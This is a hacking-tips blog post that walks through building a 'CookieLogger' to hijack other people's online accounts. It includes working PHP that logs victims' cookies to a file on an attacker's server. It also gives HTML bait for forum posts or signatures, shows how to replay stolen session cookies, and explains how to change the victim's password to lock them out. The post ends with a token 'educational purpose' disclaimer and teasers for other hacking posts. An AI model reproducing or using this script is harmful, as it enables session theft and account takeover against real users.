Skip to main content

CookieLogger and Hack any Account

Create a CookieLogger and Hack any
Account!
Cookies stores all the necessary
Information about one’s account ,
using this information you can hack
anybody’s account and change his
password. If you get the Cookies of
the Victim you can Hack any
account the Victim is Logged into
i.e. you can hack Google, Yahoo,
Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is
Used to Steal anybody’s Cookies and
stores it into a Log File from where
you can read the Cookies of the
Victim.
Today we are going to show How to
make your own Cookie Logger…
Hope you will enjoy Reading it …
Step 1: Save the notepad file from
the link below and Rename it as
Fun.gif:
http://crocko.com/
1702516956.html
Step 2: Copy the Following Script
into a Notepad File and Save the file
as cookielogger.php:
<?php
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry
for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET
["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry
for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry
for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry
for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File
and Save it as logfile.txt
Step 4: Upload this file to your
server
cookielogger.php -> http://
www.yoursite.com/cookielogger.php
logfile.txt -> http://
www.yoursite.com/logfile.txt
(chmod 777)
fun.gif -> http://www.yoursite.com/
fun.gif
If you don’t have any Website then
you can use the following Website
to get a Free Website which has php
support :
http://0fees.net/
Step 5: Go to the victim forum and
insert this code in the signature or a
post:
http://crocko.com/
1702516964.html
<a href="www.yoursite.com/
fun.gif "><img style="cursor:
pointer; width: 116px; height:
116px;" src="nesite.com/jpg" /></
a>
Step 6: When the victim see the
post he view the image u uploaded
but when he click the image he has
a Temporary Error and you will get
his cookie in log.txt . The Cookie
Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%
7Bs%3A11%3A%22autologinid%
22%3Bs%3A0%3A%22%22%3Bs%
3A6%3A%22userid%22%3Bi%
3A-1%3B%7D; phpbb2mysql_sid
=3ed7bdcb4e9e41
737ed6eb41c43a4ec9
Step 7: To get the access to the
Victim’s Account you need to
replace your cookies with the
Victim’s Cookie. You can use a
Cookie Editor for this. The string
before “=” is the name of the cookie
and the string after “=” is its value.
So Change the values of the cookies
in the cookie Editor.
Step 8: Goto the Website whose
Account you have just hacked and
You will find that you are logged in
as the Victim and now you can
change the victim’s account
information.
Note : Make Sure that from Step 6
to 8 the Victim should be Online
because you are actually Hijacking
the Victim’s Session So if the Victim
clicks on Logout you will also
Logout automatically but once you
have changed the password then
you can again login with the new
password and the victim would not
be able to login.
Disclaimer: We don’t take
responsibility for what you do with
this script, served for educational
purpose only...

Comments

Popular posts from this blog

How To Find The IP Address Of A Website

In many IT trickz and hack, We need to know the IP ( Internet Protocol ) address of the Website. Like if the website is blocked in the System then we can access it if we own the IP address of that website. But the Question arises that.. How to Find the IP Address of  Website ? Step 1 : Open Command Prompt. ( Go to Run and type cmd and hit Enter )

HOW TO HACK REMOTE COMPUTER USING IP ADDRESS?

HOW TO HACK REMOTE COMPUTER USING IP ADDRESS? Note: we are not responsible what you are going to do with this trick FIRSTLY WE WILL TELL YOU WHAT IS INTERNET PROTOCOL (IP) The Internet Protocol is the principal communications protocol used for relaying datagram (packets) across an internetwork using the Internet Protocol Suite. Responsible for routing packets across network boundaries, it is the primary protocol that establishes the Internet. IP is the primary protocol in the Internet layer of the Internet Protocol Suite and has the task of delivering datagrams from the source host to the destination host solely based on their addresses. For this Purpose, IP defines addressing methods and structures for datagram encapsulation Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house...

How To Skip Ads In adf.ly On Opera Mini ( Mobile )

More then 60% user on internet use the internet through there mobile. And many time when we want to download something, we have to skip the adf.ly's ads. But the ads won't load in opera mini. So there is an easy trick to skip adf.ly's ads in opera mini. Step 1 : Open the page. Step 2 : Enter the java script in address bar. And hit enter/go. javascript:refresh   Step 3 : Click on Skip Ad . And the desired page will open.   Step 4 : Access your desired Webpage :)    CLICK HERE to try the Trick.